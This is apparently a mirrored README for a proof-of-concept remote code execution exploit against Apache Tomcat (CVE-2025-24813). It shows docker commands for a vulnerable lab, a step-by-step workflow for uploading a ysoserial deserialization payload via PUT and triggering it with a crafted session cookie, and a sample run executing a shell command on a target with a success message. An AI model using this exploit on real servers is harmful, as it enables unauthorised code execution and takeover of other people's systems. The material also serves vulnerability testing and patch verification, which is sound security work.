Share 
## https://sploitus.com/exploit?id=2AC31CA5-D15F-5718-B86D-F39FEF36BC64
# CVE-2025-24813
Proof of Concept (PoC) script for CVE-2025-24813, vulnerability in Apache Tomcat.

The script has been modified based on the [related link](https://github.com/absholi7ly/POC-CVE-2025-24813) and tailored to my needs.

## Setup Vulnerable Tomcat Environment
Given environment based on the official Tomcat 9.0.90 image. It removes the server's read-only restriction and configures it to save session data to disk. Then, it automatically deploys application by copying ROOT.war file into Tomcat’s webapps/ directory.
   ```
docker build -t cve-2025-24813 .
docker run --name cve-2025-24813 -it -d -p 8080:8080 cve-2025-24813
   ```

## Workflow
1. A `check.txt` file with the Content-Range header is placed to verify if the server is accepting PUT requests.
2. If the server is writable, a payload for the desired command is generated using `ysoserial`.
3. The malicious session file is uploaded to the directory via a PUT request, linking it to the Session ID and FileName.
4. A GET request is sent with a custom `JSESSIONID`, triggering deserialization.
5. The temporary payload file deleted from the directory.

## Usage
   ```
$ python3 cve_2025_24813.py

 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•    β•šβ•β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ•β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•      β•šβ•β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ•‘β•šβ•β•β•β•β–ˆβ–ˆβ•—
β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
β–ˆβ–ˆβ•‘     β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β•β•šβ•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β• β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β• β•šβ•β•β•β•β–ˆβ–ˆβ•‘β•šβ•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β• β•šβ•β•β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β•šβ•β•β•β–ˆβ–ˆβ•—
β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—     β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•
 β•šβ•β•β•β•β•β•  β•šβ•β•β•β•  β•šβ•β•β•β•β•β•β•    β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β•      β•šβ•β•β•β•β•β•β•     β•šβ•β• β•šβ•β•β•β•β•  β•šβ•β•β•šβ•β•β•β•β•β•
    
                    --- Apache Tomcat Remote Code Execution PoC by Hakan Karabacak ---

Enter target URL (e.g., http://target.com:8080): http://target.com:8080
Enter command to execute (default: bash -c echo${IFS}$(id)>/tmp/RCE): 
Enter path to ysoserial.jar (default: ysoserial.jar): 
Enter ysoserial gadget chain (default: CommonsCollections6): 
[*] Session ID: hk1337
[+] Server is writable via PUT: http://target.com:8080/check.txt
[*] Generating ysoserial payload for command: bash -c echo${IFS}$(id)>/tmp/RCE
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://target.com:8080/hk1337.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://target.com:8080 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
   ```

## PoC
https://github.com/user-attachments/assets/5a271e6f-1126-459a-852b-603f39a68616